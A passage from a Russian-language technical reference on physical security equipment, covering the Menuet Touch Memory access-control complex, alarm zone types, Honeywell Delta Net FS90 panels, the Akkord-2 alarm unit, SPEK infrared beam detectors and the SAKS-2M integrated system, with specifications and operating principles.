Карточка Touch Memory содержит 248 комбинаций кода, что делает практически невозможным его подбор. Карточка обладает высокой механической прочностью, стойкостью к электромагнитному воздействию и служит более 10 лет. Она обеспечивает мгновенное считывание информации путем легкого касания считывателя. Одна идентификационная карточка избавляет от необходимости ношения связки ключей, так как может открывать несколько дверей. Миниатюрные размеры устройства позволяют оформить персональные идентификаторы в виде брелоков и карточек (рис. 2. 10), похожих на кредитные или таксофонные. Код утерянной карточки навсегда удаляется из памяти системы. Замки оснащены системой аварийного отпирания механическим ключом.

Основные технические характеристики сетевого комплекса «Менуэт»:

Количество обслуживаемых дверей (с возможностью

расширения), шт. ....................................................................... 1 — 128

Количество пользователей на один электронный замок, чел ............ 1 —740

Общее число пользователей системы, чел. .................................... 1 —2500

Дальность передачи данных по сети замков, м.............................. 1 — 1200

Время отпирания замка, с.................................................................. 0, 3

Время разрешенного прохода

(с момента касания картой), с............................................. регулируемое

Потребляемая мощность одного дверного комплекта

в режиме ожидания, Вт..................................................................... 0, 8

Максимальная потребляемая мощность одного дверного

комплекта, Вт................................................................................... 2, 5

Напряжение питания:

переменного тока, В.................................................................... 220

постоянного тока, В.................................................................... 12

2-2-22.jpg

Рис. 2.11. Состав комплекса «Менуэт»:

1 — сетевая карта; 2 — накладка косячная; 3 — электромеханический замок с датчиком положения двери и двумя считывателями электронных карточек; 4 — кабель соединительный; 5 — кабель питания;

6 — кнопка дистанционного управления замком; 7 — кабель канала передачи данных; 8 — контроллер замка; 9 — плата адаптера; 10 — считыватель кода электронных карточек

Для функционирования комплекса необходим IBM-совместимый компьютер с процессором не ниже i80386 и тактовой частотой более 33 МГц, оперативной памятью не менее 4 Мбайт и свободным дисковым пространством не менее 5 Мбайт, оснащенный манипулятором «мышь», имеющий два свободных слота расширения шины ISA для установки сетевой карты и карты адаптера, а также монитор VGA с видеокартой. Состав комплекса «Менуэт» и размещение его элементов представлены на рис. 2. 11.

Комплекс "Менуэт" работает следующим образом. После установки комплекса производится регистрация пользователей на рабочем месте администратора безопасности, т.е. вводится фамилия пользователя, регистрируется его личный идентификатор и производится назначение полномочий по доступу в помещения.

Для каждого пользователя назначаются двери, проход в которые разрешен, и определяется регламент посещения помещений. Затем компьютер автоматически загружает сформированную матрицу доступа в энергонезависимую память контроллера каждого замка. С этого момента решение о допуске в помещение принимает контроллер замка.

Процесс распознавания идентификатора заключается в считывании его уникального номера, сравнении со списком идентификаторов, разрешенных к проходу, проверки расписания прохода и сравнении с текущим временем. Если

доступ в это помещение разрешен и пользователь пришел в разрешенное время, звучит специальный тональный звуковой сигнал и замок отпирается. В противном случае, контроллер подает звуковой сигнал «Проход запрещен».

Во всех случаях контроллер системы производит запись о происшедших событиях в энергонезависимую память (ведет собственный протокол событий). При этом производится запись даты, времени прохода и попытки несанкционированного прохода. Протоколируются случаи, когда дверь была оставлена незакрытой и команды, переданные с компьютера.

Администратор имеет возможность управления комплексом с компьютера. Он может отпирать замки, временно или постоянно; блокировать или разблокировать замки; подавать команды по изменению режима работы замков; выполнять тестирование системы и контроллеров замков.

Комплекс позволяет считывать протоколы событий контроллеров замков. При этом протокол копируется из контроллера замка на жесткий диск компьютера и содержимое памяти контроллера обнуляется. На основе анализа протоколов работы замков производится учет посещаемости, рабочего времени, выявляются лица, попытавшиеся зайти в помещения, допуск в которые для них запрещен.

Функционирование комплекса не требует выделения специализированного компьютера и круглосуточного обслуживания замков. Данные могут обрабатываться периодически. Выход из строя отдельных структурных элементов не приводит к нарушению работы всей системы в целом.

Рис. 2.10. Идентификаторы Touch Memory

Изображение: 

Рис. 2.11. Состав комплекса «Менуэт»:

Изображение: 

2.3. Системы охраны и наблюдения.

2. 3. Системы охраны и наблюдения

Если вы заинтересованы в надежной охране вашей личной собственности (имущества квартир, загородных домов, дач, гаражей и т. п.), собственности вашей фирмы или предприятия (офисов, магазинов, складов, производственных помещений), то незаменимыми помощниками в этом деле станут системы охраны, наблюдения и безопасности отечественного и зарубежного производства.

Существует множество современных систем сигнализации различного уровня сложности — от простых «кнопок» до сложных микропроцессорных устройств. Эти системы имеют, как правило, автономное питание. Они обеспечивают контроль охраняемой территории с помощью специальных датчиков-извещателей, четко фиксирующих любые нарушения охраняемой зоны и выдающих звуковое оповещение об этом. Многие системы имеют возможность дистанционной передачи сигнала тревоги на центральный пульт охраны и выполняют ряд других сервисных функций.

С целью более полного понимания излагаемого ниже материала рассмотрим основные определения и термины, используемые при описании принципов функционирования систем охраны и безопасности.

Системы охраны и безопасности в процессе работы могут находиться в различных режимах: в режиме охраны (полной или частичной), в режиме наблюдения (снята с охраны) и режиме входа/выхода (см. ниже).

В режиме полной охраны система осуществляет контроль за всеми подключенными зонами (датчиками) и обеспечивает наивысший уровень безопасности. В режиме частичной охраны возможно отключение некоторых зон, например детекторов движения, расположенных внутри помещения. В этом режиме нахождение в помещении людей и животных не влияет на работу системы, но в то же время позволяет контролировать взлом окон, дверей, стен, возникновение пожара и т. п.

В состоянии тревоги производится выдача тревожных извещений путем замыкания или размыкания контактов выходных реле системы (и подключенного к ним охранного шлейфа) или путем передачи модулированных ВЧ сигналов по линиям связи на пульты охраны и включения исполнительных устройств и извещателей (сирен, прожекторов, автодозвонщиков и т. п.). Передача модулированных ВЧ сигналов производится с помощью аппаратуры высокочастотного уплотнения типа «Атлас-3», «Атлас-6» и т. п. по занятым телефонным линиям связи на пульты охранных систем типа «Фобос», «Нева» и т. п.

В состоянии тревоги одной из зон система фиксирует и заносит в память номер или адрес сработавшей зоны, время события и другую информацию. При этом остальные зоны продолжают находиться в режиме охраны. Из режима наблюдения в режим охраны зоны могут переводиться с контрольной панели вручную оператором или автоматически, по истечении определенного интервала времени, программируемого в широких пределах.

В случае использования многозоновой системы охраны существует возможность определения более или менее критических зон тревоги. Например, срабатывание зоны охраны внешнего периметра будет являться менее критической зоной тревоги, чем срабатывание зоны внутри помещения (например, срабатывание пожарных датчиков). При этом менее критические тревоги могут отменяться более критическими.

Режим входа/выхода необходим для организации перемещения по охраняемому объекту с целью выключения (включения) режима охраны. В этом режиме переход зон в состояние тревоги может происходить без задержки и с задержкой по времени. В первом случае система переходит в состояние тревоги сразу же после срабатывания зоны прохода (дверь, турникет и т. п.), причем восстановление зоны не приводит к отмене этого режима. Во втором случае переход системы в состояние тревоги происходит с временной задержкой (единицы-десятки секунд), что позволяет пользователю при входе отключить режим охраны до срабатывания системы, а при входе — заблокировать включение зон охраны и переход системы в состояние тревоги на время, необходимое для того, чтобы спокойно покинуть помещение. Время задержки может программироваться пользователем в широком диапазоне значений. В некоторых системах охраны предусматривается программирование маршрута прохода. Это позволяет включать временную задержку в нескольких зонах, расположенных на маршруте следования пользователя от входа до контрольной панели и обратно.

В зависимости от используемых датчиков система охраны состоит из зон, различных по своему функциональному назначению. Наиболее часто встречаются следующие типы зон:

> тревоги;

> нападения (кнопка тревоги);

> принуждения;

> круглосуточной (24 часа) охраны;

> вмешательства;

> прохода (входа/выхода).

Зона нападения представляет собой специально устанавливаемую или расположенную на клавиатурной панели кнопку тревоги, нажатие на которую переводит систему в состояние тревоги, независимо от того, в каком режиме работы она находилась до этого.

Зона принуждения (зона молчаливой тревоги) предназначена для перевода системы в состояние тревоги в том случае, когда пользователя путем насильственных действий принуждают отключить режим охраны. При этом система выдает тревожное извещение на пульт охраны без звуковой или световой сигнализации, имитируя снятие режима охраны.

Зона круглосуточной (24 часа) охраны предназначена для постоянной работы с использованием электроконтактных датчиков из фольги, детекторов битого стекла, датчиков пожарной сигнализации и т. п. Эта зона может находиться в режиме охраны круглосуточно, независимо от того, в каком режиме находятся другие зоны.

Зона вмешательства Tamper представляет собой набор датчиков вскрытия детекторов движения, битого стекла и линий установленного оборудования, которые срабатывают при попытке блокирования подключенных к системе видеокамер, датчиков, сирен и другого оборудования путем закорачивания или обрыва соединительных проводов, вскрытия корпусов или их перемещения (например, снятие со стены). При нарушении этой зоны в режиме наблюдения (система снята с охраны) срабатывает местная тревога (сирена, звонок). В остальных режимах дополнительно выдаются извещения на центральный пульт наблюдения установленным порядком.

Зона входа/выхода. Нарушение этой зоны в режиме охраны вызывает немедленную реакцию системы и переход ее из нормального состояния в состояние тревоги. Возможен режим, при котором зона входа/выхода переводит систему из нормального состояния в состояние тревоги с задержкой по времени.

2.3.1. Системы охранной сигнализации Delta Net.

2. 3. 1. Системы охранной сигнализации Delta Net

Семейство систем охранных сигнализаций Delta Net фирмы Honeywell (США), обеспечивающих охрану и безопасность, включает в себя обычные и интеллектуальные системы обнаружения и оповещения, системы охраны и ограничения доступа.

Система Delta Net FS90 F&S System (FS90) предназначена для обнаружения несанкционированных действий в стандартной и нестандартной зонах, в пересечении зон, для оповещения, контроля, наблюдения и сигнализации, управления отключением зон и подачи локальных звуковых сигналов. Функции охраны включают в себя непосредственное и дистанционное переключение режимов и высоконадежное наблюдение.

Система Delta Net FS90 Plus F&S System (FS90 Plus) предназначена для поддержки функций F&S по контролю и управлению конкретными охранными устройствами (а не только целыми зонами). Система FS90 Plus включает в себя до девяти интерфейсных плат интеллектуальных адресных шлейфов, каждая из которых поддерживает либо два двухжильных шлейфа, либо один устойчивый к неисправностям цепи четырехжильный шлейф. Каждый шлейф контролирует до 99 индивидуально адресуемых аналоговых датчиков и до 99 адресуемых пунктов контроля и управления, всего до 967 пунктов в одной системе.

Системы ограничения доступа контролируют до 8 устройств считывания магнитных карточек и (или) устройств набора кода (до 29). Система позволяет применять карточки, изготовленные по различным технологиям, допускает многоуровневый запрет повторного прохода, допуск в помещение только двух или более сотрудников одновременно, доступ только в присутствии оператора, управление лифтами.

Особенности системы:

> обычное и интеллектуальное обнаружение и сигнализация;

> автономное функционирование и (или) интеграция с системами более высокого уровня;

> конфигурирование в соответствии с конкретными требованиями;

> легко изменяемые файлы данных в энергонезависимой памяти;

> ограничение доступа и управление дверьми.

Система Delta Net FS90 F&S System

Система FS90 состоит из блока питания, батареи аварийного питания, системной платы с восемью слотами для установки функциональных плат и девятью клеммниками для подключения кабелей, управляющей платы (СА Control Board), которая может управлять четырьмя полностью оснащенными системными платами, и ряда функциональных плат для конкретных применений. Системная плата размещена в корпусе с запирающейся дверцей (рис. 2. 49).

Размещение всех компонентов в корпусе показано на рис. 2. 50. Корпус может быть одинарной или двойной вместимости и содержать одну или две системные платы соответственно.

Для контроля за целостностью системы управляющая плата каждые 24 часа вычисляет контрольную сумму файлов своей операционной системы и сравнивает ее со значением, полученным ранее, а тестирующие шлейфы генерируют сигналы тревоги в случае сбоя микропроцессора.

2-3-11.jpg

Рис. 2. 49 Система FS90

Оснащенная коммуникационной платой и соответственным образом подключенная, FS90 может служить для сбора данных в системах более высокого уровня. Если связь с такими системами потеряна, FS90 продолжает самостоятельно обеспечивать охрану и противопожарную безопасность.

Операционная система комплекса FS90 хранится в электрически программируемом ПЗУ. Пользователь может изменять значения параметров, используемых по умолчанию, с помощью переключателей на управляющей плате. В охраняемых зонах на контрольных панелях обеспечивается:

> индикация состояния тревоги или неисправности в зоне;

> отключение конкретной зоны охраны;

> проверка угрозы (временной интервал до 60 с);

2-3-12.jpg

Рис. 2. 50. Размещение компонентов в корпусе системы FS90

> повторное обнаружение;

> индикация тревоги или неисправностей по зонам охраны;

> -кодирование сигналов тревоги (от 20 до 120 гудков в минуту) для каждой охраняемой зоны;

> задержка подачи сигнала тревоги;

> отключение сигнала тревоги (до 8 минут).

Для дополнительной охраны системы от попыток получения несанкционированного доступа (НДС) к ней модуль, расположенный на конце линии, посылает закодированные сигналы, которые расшифровываются декодером на функциональной плате системы FS90. При несоответствии отправленных модулем кодов с хранящимися в памяти системы или при отсутствии сигналов от модуля срабатывает сигнализация.

Основные технические характеристики системы FS90:

Диапазон рабочих температур, С............................................ от 0 до 49

Влажность, %............................................................................... 5 — 95

Напряжение питания, В..................................................................... 28

Потребляемый ток:

в дежурном режиме не более, А....................................................... 2

в состоянии тревоги не более, А....................................................... 4

Система Delta Net FS90 Plus F&S System

Система FS90 Plus выполняет все функции системы FS90, а также ряд дополнительных. Она обрабатывает аналоговую информацию от тепловых и дымовых датчиков. Модули контроля типа ТС809А и ТС809В поддерживают работу шлейфа по контролю охранных, контрольных и противопожарных устройств. Пример шлейфа приведен на рис. 2. 51.

При коротком замыкании на участке шлейфа модуль изоляции ТС811А позволяет отключить его. При чем это не повлияет на работу остальных частей шлейфа.

2-3-13.jpg

Рис. 2. 51. Пример шлейфа FS90 Plus

FS90 Plus может находиться в трех режимах: охраны, наблюдения и неисправности. Имеется возможность определения адреса датчика и его состояния, а также регулировки порогов срабатывания датчиков и других параметров.

Для уменьшения ложных срабатываний FS90 Plus проводит контроль состояния детекторов, проверяет уровни сигналов аналоговых датчиков и по среднесуточному значению контролируемого параметра автоматически производит коррекцию их чувствительности.

Дополнительно на терминале более высокого уровня отображается информация об адресе устройства и его состоянии.

Система FS90 Plus Delta Net Graphic Central

Система охранно-пожарной сигнализации FS90 Plus Delta Net Graphic Central (с центральной графической системой — ЦГС) предоставляет, с одной стороны, такое экономное решение, как многоканальность, а с другой — всю мощь централизованной системы управления зданием. В автономном режиме панели FS90 Plus сами по себе обеспечивают надежную защиту. Одновременно они могут служить распределенными панелями коммуникации для центральной станции, что позволяет оператору получать дополнительную информацию и расширять функции управления зонами. Особенности системы:

> минимальные затраты при монтаже системы;

> превосходный интерфейс пользователя;

> мгновенное отображение на графическом дисплее информации по зданию;

> простота изменения конфигурации системы в соответствии с дополнительными требованиями;

> связь с другими системами управления зданием;

> надежная защита на местах.

ЦГС позволяет оператору просматривать, изменять и сохранять данные, передаваемые по комбинированной сети отдельными панелями сигнализации. Используя мощную компьютерную графику и программное обеспечение, персо-

2-3-14.jpg

Рис. 2. 52. Командный блок системы

нал, отвечающий за управление зданием и безопасность, может быстро оценить состояние системы, выполнить необходимые инструкции, выявить и устранить возникающие проблемы, а также вести архив данных.

Графический дисплей с высоким разрешением позволяет просматривать и оценивать информацию о состоянии системы. Цветное отображение информации облегчает определение состояния системы (норма, тревога, неисправность). Любая система семейства Delta Net F&S, независимо от того, работает она самостоятельно или соединена с ЦГС, может дополняться командным блоком (рис. 2. 52), в состав которого входят:

> жидкокристаллический дисплей для вывода текстовых сообщений о неисправностях и тревогах;

> принтер с термобумагой для распечатки данных;

> клавиатура для ввода команд и данных.

Рис. 2.49 Система FS90

Изображение: 

Рис. 2.50. Размещение компонентов в корпусе системы FS90

Изображение: 

Рис. 2.51. Пример шлейфа FS90 Plus

Изображение: 

Рис. 2.52. Командный блок системы

Изображение: 

2.3.10. Прибор приемно-контрольный охранно-пожарный "Аккорд-2".

2.3.10. Прибор приемно-контрольныи охранно-пожарный «Аккорд-2»

Прибор предназначен для контроля восьми шлейфов сигнализации как в автономном режиме с подачей звукового и светового сигналов, так и с передачей тревожного извещения на пульт централизованного наблюдения по одной или двум выделенным или занятым телефонным линиям.

Прибор «Аккорд-2» является усовершенствованным вариантом прибора "Аккорд" с расширенными функциональными возможностями. Он применяется как автономная или централизованная система для охраны объектов (магазинов, офисов, сберкасс, складов, коттеджей, квартир и т. п.).

Режимы работы прибора:

> режим частичной охраны — контроль двух, четырех или шести ШС (пожарная и тревожная сигнализация);

> режим полной охраны — контроль всех восьми шлейфов;

> режим входа/выхода.

В этих режимах состояние тревоги сопровождается выдачей тревожного извещения при нарушении ШС или вскрытии прибора путем размыкания контактов реле или передачи модулированных ВЧ сигналов по системе «Атлас-3», «Атлас-б»; включением встроенной (12 В, 90 дБ) или внешней (220 В) сирен и внешнего светового оповещения (лампа 220 В).

Прибор обеспечивает задержку на включение оповешателей при входе и блокировку извещателей при выходе.

«Аккорд-2» имеет восемь шлейфов сигнализации, из них:

> ШС1, ШС2 — шлейфы охранной сигнализации с возможностью установки времени задержки включения звуковых и световых оповещателей;

> ШСЗ — ШС8 — шлейфы охранной или пожарной сигнализации с возможностью питания по шлейфу извещателей типа «Волна-5» (до 2-х штук), ДИП-3 (до 10 штук).

В шлейфы могут включаться магнитоконтактные датчики (СМК, ИП-105, ИО-102 и т. д.), извещатели с релейным выходом («Аргус», «Фотон», «Эхо» и т. п.) и извещатели с питанием по шлейфу ( «Окно», «Волна-5», ДИП-3 и т. п.).

Прибор имеет отдельный выход+ 12 В, рассчитанный на ток нагрузки 150 мА, для питания извещателей, а также встроенную сирену мощностью 100 дБ (+ 12 В, 0, 25 А).

Существует несколько вариантов работы прибора «Аккорд-2»:

> постановка на охрану с закрытой дверью с ограниченным временем выхода (30, 60 или 120с);

> постановка на охрану с открытой дверью с неограниченным временем выхода (до закрывания двери);

> при снятии с охраны после нарушения ШС1 время включения оповещателей может быть ограничено (30, 60 или 120 с).

Выбор вариантов происходит автоматически в зависимости от положения входной двери (шлейф ШС1).

Связь с ПЦН может осуществляться либо по четырем каналам — четыре релейных выхода; либо двум — два релейных выхода или два канала с высокочастотным уплотнением «Атлас-3»; либо по одному каналу с высокочастотным уплотнением «Атлас-6».

Для визуального контроля за состоянием системы служат индикаторы:

> текущего состояния и памяти тревог по каждому ШС;

> индикатор состояния встроенного аккумулятора (включается кнопкой «Контроль»);

> индикатор наличия напряжения питания 220 В:

> индикатор неотключаемой памяти тревог (12±6 мин) по ШС5 и ШС6 (тревожная сигнализация);

> выносные светодиодные индикаторы состояния и памяти тревог по каж дому ШС. К прибору подключаются различные звуковые и световые оповещатели:

> встроенная сирена (12В, 250 мА, 100 дБ);

> выносная сирена (12 В, до 300 мА; 220В, 40 ВхА);

> светодиодный блок выносных индикаторов;

> выносная лампа 220 В мощностью 25 Вт.

Питание прибора осуществляется от сети 220 В (+ 10%... -15%), 50 Гц. Имеется внешнее резервное питание+ 12 В или+ 24 В, а также встроенный аккумулятор емкостью 1 Ахч или 3 Ахч (24 часа работы) с автоматическим подзарядом и контролем разряда (время работы в режиме частичной охраны 8 часов).

2.3.11. Извещатели охранные линейные оптико-электронные фирмы СПЭК.

2.3.11. Извещатели охранные линейные оптико-электронные фирмы СПЭК

Охранные извещатели "СПЭК-5" и «Вектор-СПЭК» предназначены для охраны периметров и закрытых помещений с использованием датчиков инфракрасного излучения (ИК). Сервисные функции приборов без проблем позволяют настроить датчики извещателя и контролировать их работоспособность в режиме охраны. Извещатели имеют достаточный запас по мощности, что позволяет им работать в условиях плохой видимости (больших оптических потерях, т. е. при дожде, снеге и тумане и т. п.). Извещатель выполнен на современной элементной базе, прост в установке и настройке, позволяет создавать многолучевые барьеры любой плотности в инфракрасном диапазоне. Приборы оборудованы защитным корпусом.

Основные характеристики приборов "СПЭК-5" и "Вектор-СПЭК":

Дальность действия на улице, м.................................................. 75—150

Коэффициент запаса по ИК энергии не менее.................................... 100

Сохранение работоспособности при оптических потерях, %.................... 99

Число И К лучей................................................................................ 1

Напряжение питания постоянного тока:

«Вектор-СПЭК», В.............................................................. 10, 2-30

«СПЭК-5», В....................................................................... 10, 8-27

Ток, потребляемый приемником и излучателем:

при Uпит=12 В не более, мА ............................................................30

при Uпит=24 В не более, мА ............................................................ 60

Помехоустойчивость к фоновой освещенности:

от электроосветительных приборов, лк.......................................... 500

от солнца, лк........................................................................... 10000

Чувствительность извещателя «Вектор-СПЭК», мс..................... 100—500

Длительность сигнала тревоги не менее, с............................................... 2

Диапазон рабочих температур,С........................................ от -40 до +55

Габаритные размеры:

"СПЭК-5", мм................................................................. 65х140х145

«Вектор-СПЭК»-, мм......................................................... 75х80х135

Масса излучателя и приемника:

«СПЭК-5» не более, кг ................................................................. 1,2

"Вектор-СПЭК" не более, кг ........................................................ 1,0

Устройства имеют дистанционный контроль функционирования. Благодаря широкому ИК лучу системы, требования к жесткости основания, на котором установлены датчики, минимальны.

Работоспособность извещателя на улице без подогрева оптики обеспечивается герметичным исполнением оптического узла излучателя и приемника, а также вентиляционной системой защитного корпуса.

Извещатель подключается к пульту, реагирующему на размыкание контактов реле на время не более 2 с.

Для точной юстировки оптических осей приемника и излучателя извещателя первый имеет выход «Контроль». Точной юстировке соответствует максимальное показание вольтметра постоянного тока, подключенного к выводам «Контроль» и "Uпит" приемника.

Для дистанционного контроля работоспособности прибора "СПЭК-5" - излучатель извещателя имеет вывод «Прерывание». Замыкание этого вывода на минус источника питания (-Uпит) выключает излучатель, что приводит к выдаче приемником сигнала тревоги. При использовании извещателя в составе компьютерной системы охраны данный режим позволяет осуществлять круглосуточную автоматическую проверку работоспособности извещателя путем регистрации соответствующего отклика реле приемника на команду компьютера «Прерывание».

Один извещатель перекрывает прямолинейный участок территории одним ИК лучом. Условие работоспособности устройства — наличие прямой видимости между излучателем и приемником.

Для блокировки периметра со стороной до 150 м однолучевым ИК барьером необходимо установить 4 излучателя и 4 приемника. Для охраны участка длиной более 150 м необходимо последовательно установить необходимое число извещателей, каждый из которых будет перекрывать участок до 150 м.

Наличие постороннего объекта в области потока ИК энергии не достаточно для формирования сигнала тревоги. Необходимым условием включения тревожной сигнализации прибора является перекрытие оптической оси (воображаемой прямой между оптическими осями излучателей и приемника), когда тень от объекта попадает на окно приемника извещателя (рис. 2.75).

Прибор "Вектор-СПЭК" позволяет устанавливать чувствительность прибора (t), что соответствует скорости пересечения ИК луча (V). Наглядно это показано на рис. 2.76.

2-3-111.jpg

Рис. 2.75. Условия формирования сигнала тревоги

Для регистрации несанкционированного перемещения в зоне охраны можно использовать один или несколько ИК лучей как в вертикальной (по высоте), так и в горизонтальной плоскостях, перекрывающих необходимую площадь или периметр территории, подступы к зданиям, воротам и т.д.

2-3-112.jpg

Рис. 2.76. Выбор времени помехозащищенности

Для построения охранного ИК барьера на практике используются несколько вариантов, каждый из которых предполагает применение одного или нескольких извещателей. В состав каждого извещателя (рис. 2.77) входит излучатель и приемник.

При создании однолучевого ИК барьера (рис. 2.78) используется один извещатель.

2-3-113.jpg

Рис. 2.77. Состав извещателя

2-3-114.jpg

Рис. 2.78. Однолучевой ИК барьер на извещателе «Вектор-СПЭК»

Устройство выдает сигнал тревоги при:

> пересечении И К луча на время, превышающее уровень установленной помехозащищенности;

> при оптических потерях более 99%;

> пропадании напряжения питания;

> нарушении юстировки датчиков;

> превышении фоновой освещенности.

При создании двухлучевого ИК барьера (рис. 2.79) используются два извещателя. Излучатели располагаются по одному с каждой стороны. При пересечении луча 1 приемник П1 выключает излучатель И2, луч 2 прерывается. Приемник П2 формирует сигнал тревоги, передаваемый по шлейфу сигнализации. Расстояние между ИК лучами может быть в пределах от 0,1 до 10 м.

2-3-115.jpg

Риc.2.79. Двухлучевой ИК барьер

Сигнал тревоги выдается при пересечении объектом любого ИК луча. Для организации многолучевого ИК барьера (более двух ИК лучей) необходимо иметь два извещателя и два дополнительных приемника (Пд). С каждой стороны (рис. 2. 80) барьера устанавливается по одному излучателю. Можно установить еще два (четыре) дополнительных приемника Пд и получить шести (восьми) лучевой ИК барьер. Расстояние D между датчиками обычно составляет 30—70 см. Сигнал тревоги выдается при пересечении объектом любого луча.

При создании четырехлучевого синхронного ИК барьера используются два извещателя "Вектор-СПЭК" (рис. 2. 81). Излучатели устанавливаются с одной

tg1.jpg

Рис. 2.80. Четырехлучевой ИК барьер

стороны барьера, а приемники — с другой. Излучатель И2 работает от синхроимпульсов излучателя И1 (синхронная работа излучателей двух извещателей).

Сигнал тревоги выдается при пересечении всех ИК лучей одновременно. Синхронная работа излучателей позволяет увеличить дальность действия устройства в 1, 2 раза. При установке излучателей И1 и И2 на расстоянии D=10... 35 см (приемники П1 и П2 установлены с другой стороны барьера) имеет место селекция объектов по габаритам. Например, если небольшой предмет (рука) перекрывает один или два ИК луча, —тревоги нет, а если предмет размером более 20—25 см перекрывает все ИК лучи, — тревога! Данная схема построения ИК барьера обеспечивает высокую помехозащищенность извещателя, осо-

tg2.jpg

Рис. 2. 81. Четырехлучевого ИК барьер на извещателе «Вектор-СПЭК»

бенно при листопаде или пролетах птиц ("СПЭК-5" не позволяет организовать

синхронный И К барьер).

Извещатель можно использовать совместно с телевизионными системами наблюдения . В этом случае по команде с извещателя включается монитор для визуальной оценки обстановки и (или) видеомагнитофон для протоколирования события. Одновременно можно включать прожекторы для подсветки, создавая отпугивающий эффект для правонарушителей и привлекающий внимание охраны.

2-3-116.jpg

Рис. 2.82 Извещатель «СПЭК-5»

Питание нескольких извещателей можно осуществлять как по одной линии,

так и раздельно. Допускается питание излучателя и приемника одного извещателя от разных. источников.

.Дистанционный контроль функционирования в приборе "Вектор-СПЭК" осуществляется при подаче на вход «Контроль функционирования» излучателя И1 положительного импульса длительностью t > 0,8 с.

Размыканиек контактов в шлейфе «Саботаж» (рис. 2.78) происходит при вскрытии корпуса датчиков извещателя, а также при уменьшении мощности ИК излучения в плохих метеоусловиях, что позволяет прогнозировать ложные тревоги.

Внешний вид извещателей "СПЭК-5" и "Вектор-СПЭК" приведены на рис. 2.82 и 2.84. Габаритные размеры извещателя "Вектор-СПЭК" представлены на рис. 2.83.

2-3-117.jpg

Рис. 2.83. Габаритные размеры извещателя «Вектор-СПЭК»

2-3-118.jpg

Рис. 2.84. Извещатель «Вектор-СПЭК»

Риc.2.79. Двухлучевой ИК барьер

Изображение: 

Рис. 2.75. Условия формирования сигнала тревоги

Изображение: 

Рис. 2.76. Выбор времени помехозащищенности

Изображение: 

Рис. 2.77. Состав извещателя

Изображение: 

Рис. 2.78. Однолучевой ИК барьер на извещателе «Вектор-СПЭК»

Изображение: 

Рис. 2.80. Четырехлучевой ИК барьер

Изображение: 

Рис. 2.81. Четырехлучевого ИК барьер на извещателе «Вектор-СПЭК»

Изображение: 

Рис. 2.82 Извещатель «СПЭК-5»

Изображение: 

Рис. 2.83. Габаритные размеры извещателя «Вектор-СПЭК»

Изображение: 

Рис. 2.84. Извещатель «Вектор-СПЭК»

Изображение: 

2.3.2. Система безопасности САКС-2М.

2. 3. 2. Система безопасности САКС-2М

Система САКС-2М представляет собой устройство сбора и обработки информации, поступающей от различных средств обнаружения и контроля. К таким средствам относятся: охранные и пожарные датчики различных типов, ТВ камеры, электроуправляемые замки, освещение, вентиляция, системы пожаротушения, системы ограничения доступа и др.

В современной терминологии такие системы называют интегрированными, т. е. способными принимать сигналы и управлять всем спектром современных охранных устройств.

Система САКС-2М обеспечивает:

> точное определение места срабатывания любого средства обнаружения, выдачу звукового и светового сигнала, указание типа сработавшего устройства;

> регистрацию местоположения и времени срабатывания средств обнаружения и тревожных кнопок;

> контроль за состоянием коммуникационных линий и работоспособностью средств обнаружения;

> разнообразие способов постановки и снятия с охраны отдельных устройств или их групп;

> регистрацию всех событий, происшедших в системе, и возможность их просмотра за определенный промежуток времени;

> управление различными устройствами реагирования (блокировка дверей,

включение телекамер, систем пожаротушения, вентиляции и др.). САКС-2М — это программно-аппаратный комплекс, в состав которого входят: персональный компьютер IBM PC (с процессом не ниже Intel 386) с комплектом программ, приемная станция и адресные блоки на 6 зон (входов) каждый. Общее количество сигналов, принимаемых одной станцией, 1536.

Допускается использовать расширение до четырех одновременно работающих станций, что в итоге позволяет подключить к системе до 6144 перечисленных выше охранных устройств. В системе принята шлейфовая структура коммуникационных линий и передача сигнала в цифровой форме, что существенно упрощает ее монтаж.

Благодаря использованию в системе персонального компьютера, стандартные функциональные возможности подобных систем расширяются за счет используемого программного обеспечения. К таким возможностям относятся:

> получение поэтапных графических планов объекта охраны. На плане можно отобразить объект с прилегающей к нему территорией, подъезды к нему, поэтапные планы объекта, входы и выходы на этапах, план помещения и т. д.;

> вывод справочной информации о средстве обнаружения, рекомендаций по ликвидации создавшейся ситуации и любой другой полезной информации;

> ввод и хранение информации о принятых мерах и действиях персонала при возникновении тревожной ситуации;

> автоматическое управление различными устройствами реагирования без участия оператора;

> запись, обработка и анализ видеоизображений.

Программное обеспечение системы реализовано на языке Borland C++ под управлением операционной системы MS-DOS (версия 2. 0 и выше) для IBM совместимых компьютеров.

Максимальное число охраняемых помещений зависит от числа адресных датчиков, устанавливаемых в них. Под адресным датчиком подразумеваются собственно датчики и адресное устройство, обеспечивающее их идентификацию в сети.

Микропроцессорная логика позволяет работать системе без компьютера. При этом она может быть дополнительно укомплектована индикаторным светодиодным экраном или монитором, облегчающими работу оператора при отсутствии компьютера.

Вариант использования системы представлен на рис. 2. 53. Микропроцессорная логика, блочный подход к формированию аппаратной части, кодирование информации по уровням сложности делают систему весьма гибкой и адаптированной к широкому спектру объектов, начиная от мелких, на несколько десятков шлейфов, до очень крупных — на несколько тысяч шлейфов.

Удачные программные и аппаратные решения позволяют использовать любые типы датчиков, радиосвязь и реализовать охранные функции классическим способом (по проводам), предусмотрена возможность использования спутниковой связи, что позволяет оператору эффективно вести охрану объектов, расположенных на большой площади, с помощью мобильных патрулей.

Требуемая степень надежности системы достигается дублированием сложных блоков, т. е. ретранслятора и устройства сопряжения. В системе электропитания САКС-2М предусмотрено переключение источников питания: с сети переменного тока напряжением 220 В на питание от резервных аккумуляторов,

2-3-21.jpg

Рис. 2. 53. Вариант использования системы САКС-2М:

1 — охранные или пожарные датчики (любого типа); 2 — адресные устройства с шестью входами (1 — 32 на каждый шлейф); 3 — охранные шлейфы (8 шлейфов на 1 станцию); 4 — локальные приемные станции (1—8); 5 — центральная приемная станция; 6 — принтер; 7 — персональный компьютер

обеспечивающих непрерывную работу в течение не менее 72 часов. Основные технические характеристики системы САКС-2М:

Максимальное число адресов, обслуживаемых системой................... 12288

Максимальное число адресов на 1 локальную станцию..................... 1536

Количество шлейфов на 1 станции....................................................... 8

Максимальное число адресных устройств на 1 шлейф.......................... 32

Количество входов (адресов) на 1 адресное устройство......................... 6

Максимальное расстояние между станциями, м............................... 10000

Максимальная длина шлейфа, м....................................................... 500

Напряжение питания:

промышленная сеть, В........................................................ 220 ±15%

аккумуляторная батарея, В.................................................... 12± 10%

Напряжение в охранных шлейфах не более, В.................................. 13, 2

Напряжение в линии станция-станция не более, В................................ 27

